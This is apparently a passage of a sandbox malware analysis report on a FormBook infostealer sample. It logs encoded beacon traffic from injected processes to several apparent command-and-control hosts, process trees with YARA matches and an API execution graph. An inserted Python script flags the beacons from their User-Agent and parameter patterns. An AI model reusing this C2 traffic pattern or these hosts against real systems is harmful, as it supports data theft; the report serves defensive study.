                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 34 51 6a 77 6f 54 52 4e 4c 44 44 6f 79 51 77 5a 67 33 59 68 55 4a 4b 36 78 51 4d 7a 47 4a 49 59 68 57 48 43 52 71 63 6c 78 62 66 33 38 64 74 76 33 4c 41 70 51 52 37 44 55 65 62 78 69 58 57 4a 66 76 5a 34 4a 32 38 65 67 6d 62 65 32 37 32 48 5a 44 6a 71 33 32 55 53 39 41 56 5a 35 78 37 78 4a 4b 6f 2b 66 6f 32 46 72 38 30 39 69 4f 2f 4d 2b 66 4a 4d 58 67 6e 30 4a 76 4f 6b 52 79 53 56 52 69 6a 44 72 56 72 66 74 34 39 74 55 44 39 69 4d 72 71 6b 45 6f 34 70 66 58 76 47 6a 44 41 41 4d 68 4c 65 79 31 6a 63 44 68 4c 36 42 48 42 30 4f 31 2f 77 5a 4b 50 4c 79 4a 34 61 77 3d
                                                      Data Ascii: 66Sxjp=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tUD9iMrqkEo4pfXvGjDAAMhLey1jcDhL6BHB0O1/wZKPLyJ4aw=
                                                      Dec 10, 2024 18:01:01.615715027 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.7 | 49944 | 13.248.169.48 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:01:03.276416063 CET | 1816 | OUT | POST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 77 51 6a 46 38 54 52 71 2f 44 43 6f 79 51 78 5a 67 79 59 68 55 49 4b 36 70 55 4d 7a 62 72 49 64 39 57 42 55 64 71 65 58 4a 62 47 48 38 64 68 50 33 4f 45 70 52 46 37 44 45 53 62 78 79 58 57 4a 66 76 5a 2b 4e 32 31 76 67 6d 5a 65 32 34 78 48 5a 66 70 4b 33 53 55 53 6c 36 56 59 4e 48 36 41 70 4b 6f 61 37 6f 37 57 44 38 72 74 69 4d 38 4d 2b 75 4a 4e 72 2f 6e 30 46 46 4f 6c 31 59 53 56 5a 69 75 33 32 57 32 2b 4e 66 2b 4e 31 57 7a 78 55 4a 39 33 78 63 68 49 72 6a 71 6c 44 74 46 53 55 44 47 49 44 35 68 5a 4f 45 4b 35 67 31 48 6b 33 6d 34 6e 34 45 65 4a 62 44 6b 4d 78 69 30 6d 41 30 30 32 39 77 39 46 6f 2b 74 37 77 78 35 43 55 48 4b 55 33 39 7a 70 6c 69 31 6c 57 57 30 74 2f 56 46 64 5a 4a 4f 34 6a 35 42 48 4b 4f 74 45 36 4f 51 50 2f 47 54 56 44 73 75 56 53 62 71 6f 43 33 64 6c 78 50 69 63 53 33 54 62 5a 65 6a 69 55 38 61 67 6d 41 65 2f 62 48 4f 64 4c 63 78 4c 61 [TRUNCATED]
                                                      Data Ascii: 66Sxjp=[TRUNCATED]
                                                      Dec 10, 2024 18:01:04.487437010 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.7 | 49952 | 13.248.169.48 | 80 | 564 | C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 10, 2024 18:01:05.939208031 CET | 532 | OUT | GET /4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:01:07.031958103 CET | 399 | IN | HTTP/1.1 200 OK
                                                      content-type: text/html
                                                      date: Tue, 10 Dec 2024 17:01:06 GMT
                                                      content-length: 278
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 36 53 78 6a 70 3d 62 63 4d 2f 4a 51 2f 45 46 77 46 57 59 51 67 74 54 4f 4f 53 33 35 72 71 6f 46 4d 64 76 69 65 67 54 4a 4b 6d 78 49 70 4a 6f 66 68 46 6b 79 4a 4d 52 70 54 55 47 74 43 39 31 5a 55 50 5a 52 4d 62 55 62 4e 4b 58 42 65 48 41 70 4e 73 41 58 4a 2b 4f 48 74 4c 66 41 56 67 6e 65 33 66 44 50 4e 5a 79 41 38 6a 66 57 71 32 64 61 37 55 54 34 35 71 30 66 77 31 62 38 53 58 38 48 31 65 2f 4c 6e 72 63 52 46 6c 58 39 6f 6d 32 68 52 6f 26 50 4e 45 3d 65 30 52 50 52 66 34 48 56 4e 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE"}</script></head></html>
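The sessions above share two traits a detection engineer can key on: every request carries the same fixed Chrome/40.0.2214.94 User-Agent, and every request sends one parameter (66Sxjp here) whose value is raw base64 with unencoded '+', '/' and '=' characters, which a browser's form serializer would percent-encode, and that parameter name is reused against three different hosts (www.d48dk.top, www.8312zcksnu.bond, www.snyp.shop). The following Python script is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses requests laid out as above and reports parameter names reused across hosts, and hex_dump_to_text turns a "Data Raw" line back into text so it can be checked against the "Data Ascii" line. The sample transcript is constructed from the request lines, Host, User-Agent and Data Ascii values of sessions 4, 5, 6, 10 and 13 plus one benign control request; the function names, the 32-character minimum and the two-host threshold are this example's own choices. Nothing here determines which contacted host, if any, is the live C2; the 404, 405 and redirect responses above are consistent with decoy traffic, so the script treats every host that received the beacon as an indicator.

```python
import re
from collections import defaultdict

# Fixed User-Agent carried by every request in the sessions above.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36")

# Raw base64 blob of at least 32 characters (minimum is this example's choice).
# A browser form serializer would percent-encode '+', '/' and '=', so raw ones are a tell.
RAW_B64 = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")

# Constructed sample: request line, Host, User-Agent and Data Ascii values copied
# from sessions 4, 5, 6, 10 and 13 above, plus one benign control request.
SAMPLE_REQUESTS = """\
POST /9ffw/ HTTP/1.1
Host: www.d48dk.top
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Data Ascii: 66Sxjp=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/0w9YUa6DsmHGo9RjiKozMsbub1PRp555iE6lUYmUZ+F+HE1g40=

GET /9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE HTTP/1.1
Host: www.d48dk.top
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36

POST /d3gs/ HTTP/1.1
Host: www.8312zcksnu.bond
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Data Ascii: 66Sxjp=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBleUSVqwre9AK3SxCkSSjS+Yd2wEe24UCZe5Os4HysPW+tciJweg==

POST /4nyz/ HTTP/1.1
Host: www.snyp.shop
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Data Ascii: 66Sxjp=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgV1XPHtnbHZIi1q3x9hUj8s45god9CZd6obPikXif3pLGMTx1g==

GET /4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE HTTP/1.1
Host: www.snyp.shop
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36

GET /search?q=formbook+report HTTP/1.1
Host: www.example.com
User-Agent: curl/8.4.0
"""


def parse_requests(transcript):
    """Parse blank-line-separated requests (request line, headers, optional
    'Data Ascii:' body line, as laid out in the report) into dicts."""
    requests = []
    for block in re.split(r"\n\s*\n", transcript.strip()):
        lines = block.splitlines()
        method, target, _version = lines[0].split(" ", 2)
        path, _, query = target.partition("?")
        req = {"method": method, "path": path, "query": query, "headers": {}, "body": ""}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name == "Data Ascii":
                req["body"] = value.strip()
            else:
                req["headers"][name.strip().lower()] = value.strip()
        requests.append(req)
    return requests


def split_pairs(encoded):
    """Split 'k=v&k2=v2' without percent-decoding, so raw '+' and '/' survive."""
    return [tuple(pair.partition("=")[::2]) for pair in encoded.split("&") if pair]


def beacon_key(req):
    """Return the parameter name carrying the longest raw-base64 blob, or None.
    Taking the longest value keeps the short PNE= parameter from being chosen."""
    source = req["body"] if req["method"] == "POST" else req["query"]
    found = [(len(value), key) for key, value in split_pairs(source) if RAW_B64.match(value)]
    return max(found)[1] if found else None


def formbook_c2_candidates(requests, min_hosts=2):
    """Map each beacon parameter name to the sorted hosts it was sent to with the
    fixed User-Agent, keeping only names reused against at least min_hosts hosts."""
    hosts_by_key = defaultdict(set)
    for req in requests:
        if req["headers"].get("user-agent") != FORMBOOK_UA:
            continue
        key = beacon_key(req)
        if key:
            hosts_by_key[key].add(req["headers"].get("host", "?"))
    return {k: sorted(h) for k, h in hosts_by_key.items() if len(h) >= min_hosts}


def hex_dump_to_text(data_raw):
    """Decode a report 'Data Raw' hex line (space-separated bytes) back to text."""
    return bytes.fromhex(data_raw).decode("utf-8", errors="replace")


if __name__ == "__main__":
    for key, hosts in formbook_c2_candidates(parse_requests(SAMPLE_REQUESTS)).items():
        print(f"beacon parameter {key!r} reused against {len(hosts)} hosts: {', '.join(hosts)}")
    print(hex_dump_to_text("3c 68 74 6d 6c 3e"))
```

Run it as is to get the host list for the sample; point parse_requests at a larger transcript exported from the report to cover every session. The raw-base64 check is deliberately kept separate from the User-Agent check so that either can be relaxed when a later build changes the UA string, and the two-host threshold exists because a single host with a base64 form field is common in legitimate traffic.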



                                                      Target ID:0
                                                      Start time:11:59:02
                                                      Start date:10/12/2024
                                                      Path:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                                                      Imagebase:0x400000
                                                      File size:1'762'304 bytes
                                                      MD5 hash:B5C0BC1CA5223C4B18328235497A2EF6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                      Imagebase:0x400000
                                                      File size:1'658'880 bytes
                                                      MD5 hash:A7B2833265E5E73E4BC1B1899D393D76
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\alg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\alg.exe
                                                      Imagebase:0x140000000
                                                      File size:1'594'368 bytes
                                                      MD5 hash:114ADFAB8A4E69539FC98ABAB86561C6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:11:59:03
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                                                      Imagebase:0xba0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:138'056 bytes
                                                      MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:174'408 bytes
                                                      MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                      Wow64 process (32bit):
                                                      Commandline:
                                                      Imagebase:
                                                      File size:154'952 bytes
                                                      MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                      Has elevated privileges:
                                                      Has administrator privileges:
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:11:59:05
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\System32\AppVClient.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\AppVClient.exe
                                                      Imagebase:0x140000000
                                                      File size:1'348'608 bytes
                                                      MD5 hash:70844A25E3B4375DA206E6793BBE1975
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:13:33:36
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe"
                                                      Imagebase:0x30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:13:33:41
                                                      Start date:10/12/2024
                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                      Imagebase:0x310000
                                                      File size:28'160 bytes
                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:18
                                                      Start time:13:33:53
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe"
                                                      Imagebase:0x30000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:22
                                                      Start time:13:34:06
                                                      Start date:10/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff722870000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:3.9%
                                                        Dynamic/Decrypted Code Coverage:6.6%
                                                        Signature Coverage:8.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:55
                                                        execution_graph 108628 441de4 GetTempPathW 108629 441e01 108628->108629 108629->108629 108630 1675085 108631 167506f 108630->108631 108632 1675089 108630->108632 108635 1698550 108631->108635 108634 1675078 108637 1698556 108635->108637 108636 1698145 GetLastError 108642 1697d37 108636->108642 108658 1697dd7 108636->108658 108637->108635 108637->108636 108638 1698bc1 GetLastError 108637->108638 108639 1698986 SetEntriesInAclW 108637->108639 108637->108642 108643 16989cd OpenMutexW 108637->108643 108648 1698599 108637->108648 108649 1697d20 108637->108649 108651 169896a wsprintfW 108637->108651 108653 1698953 AllocateAndInitializeSid 108637->108653 108654 1697d30 108637->108654 108657 169890b LocalFree 108637->108657 108637->108658 108638->108637 108639->108637 108640 1698209 GetUserNameW 108640->108642 108640->108658 108641 16983fb GetUserNameW 108641->108658 108642->108634 108643->108634 108645 169824a GetLastError 108645->108634 108645->108658 108646 1697d6c GetVolumeInformationW 108646->108634 108647 169836e GetLastError 108647->108658 108648->108651 108648->108654 108649->108642 108649->108646 108650 1697d83 GetWindowsDirectoryW 108649->108650 108649->108654 108655 1697e06 GetComputerNameW 108649->108655 108650->108642 108650->108654 108651->108654 108652 1697fd4 GetLastError 108652->108658 108653->108637 108654->108642 108654->108646 108655->108642 108656 1697f6b GetVolumeInformationW 108656->108658 108657->108637 108658->108636 108658->108640 108658->108641 108658->108642 108658->108645 108658->108646 108658->108647 108658->108649 108658->108652 108658->108654 108658->108656 108659 43fe27 108672 41f944 108659->108672 108661 43fe3d 108662 43fe53 108661->108662 108663 43febe 108661->108663 108761 409e5d 60 API calls 108662->108761 108681 40fce0 108663->108681 108665 43fe92 108667 44089c 108665->108667 108668 43fe9a 108665->108668 108763 469e4a 89 API calls 4 library calls 108667->108763 108762 46834f 59 
API calls Mailbox 108668->108762 108671 43feb2 Mailbox 108673 41f950 108672->108673 108674 41f962 108672->108674 108764 409d3c 60 API calls Mailbox 108673->108764 108676 41f991 108674->108676 108677 41f968 108674->108677 108775 409d3c 60 API calls Mailbox 108676->108775 108765 420db6 108677->108765 108680 41f95a 108680->108661 108804 408180 108681->108804 108683 40fd3d 108684 44472d 108683->108684 108730 4106f6 108683->108730 108809 40f234 108683->108809 108927 469e4a 89 API calls 4 library calls 108684->108927 108688 444742 108689 44488d 108689->108688 108697 40fe4c 108689->108697 108933 47a2d9 85 API calls Mailbox 108689->108933 108690 40fe3e 108690->108689 108690->108697 108931 4566ec 59 API calls 2 library calls 108690->108931 108691 410517 108701 420db6 Mailbox 59 API calls 108691->108701 108692 444b53 108692->108688 108952 469e4a 89 API calls 4 library calls 108692->108952 108694 420db6 59 API calls Mailbox 108723 40fdd3 108694->108723 108696 4447d7 108696->108688 108929 469e4a 89 API calls 4 library calls 108696->108929 108697->108692 108702 4448f9 108697->108702 108813 40837c 108697->108813 108698 444848 108932 4560ef 59 API calls 2 library calls 108698->108932 108709 410545 _memmove 108701->108709 108710 444917 108702->108710 108935 4085c0 59 API calls Mailbox 108702->108935 108705 444755 108705->108696 108928 40f6a3 341 API calls 108705->108928 108707 4448b2 Mailbox 108707->108697 108934 4566ec 59 API calls 2 library calls 108707->108934 108716 420db6 Mailbox 59 API calls 108709->108716 108713 444928 108710->108713 108936 4085c0 59 API calls Mailbox 108710->108936 108711 40fea4 108719 444ad6 108711->108719 108720 40ff32 108711->108720 108739 410179 Mailbox _memmove 108711->108739 108712 44486b 108714 409ea0 341 API calls 108712->108714 108713->108739 108937 4560ab 59 API calls Mailbox 108713->108937 108714->108689 108745 410106 _memmove 108716->108745 108946 469ae7 60 API calls 108719->108946 108721 420db6 Mailbox 59 API calls 108720->108721 108726 40ff39 
108721->108726 108723->108688 108723->108690 108723->108691 108723->108694 108723->108705 108723->108709 108736 44480c 108723->108736 108901 409ea0 108723->108901 108726->108730 108820 4109d0 108726->108820 108727 409ea0 341 API calls 108728 444a87 108727->108728 108728->108688 108941 4084c0 108728->108941 108926 469e4a 89 API calls 4 library calls 108730->108926 108732 40ffb2 108732->108709 108732->108730 108740 40ffe6 108732->108740 108930 469e4a 89 API calls 4 library calls 108736->108930 108737 444ab2 108945 469e4a 89 API calls 4 library calls 108737->108945 108739->108730 108739->108737 108747 410398 108739->108747 108748 420db6 59 API calls Mailbox 108739->108748 108754 444a1c 108739->108754 108759 444a4d 108739->108759 108899 408740 68 API calls __cinit 108739->108899 108900 408660 68 API calls 108739->108900 108938 465937 68 API calls 108739->108938 108939 4089b3 69 API calls Mailbox 108739->108939 108940 409d3c 60 API calls Mailbox 108739->108940 108746 410007 108740->108746 108947 408047 108740->108947 108745->108739 108760 410162 108745->108760 108925 409c90 59 API calls Mailbox 108745->108925 108746->108730 108749 444b24 108746->108749 108751 41004c 108746->108751 108747->108671 108748->108739 108951 409d3c 60 API calls Mailbox 108749->108951 108751->108692 108751->108730 108752 4100d8 108751->108752 108897 409d3c 60 API calls Mailbox 108752->108897 108757 420db6 Mailbox 59 API calls 108754->108757 108755 4100eb 108755->108730 108898 4082df 59 API calls Mailbox 108755->108898 108757->108759 108759->108727 108760->108671 108761->108665 108762->108671 108763->108671 108764->108680 108768 420dbe 108765->108768 108767 420dd8 108767->108680 108768->108767 108770 420ddc std::exception::exception 108768->108770 108776 42571c 108768->108776 108793 4233a1 DecodePointer 108768->108793 108794 42859b RaiseException 108770->108794 108772 420e06 108795 4284d1 58 API calls _free 108772->108795 108774 420e18 108774->108680 108775->108680 108777 425797 108776->108777 
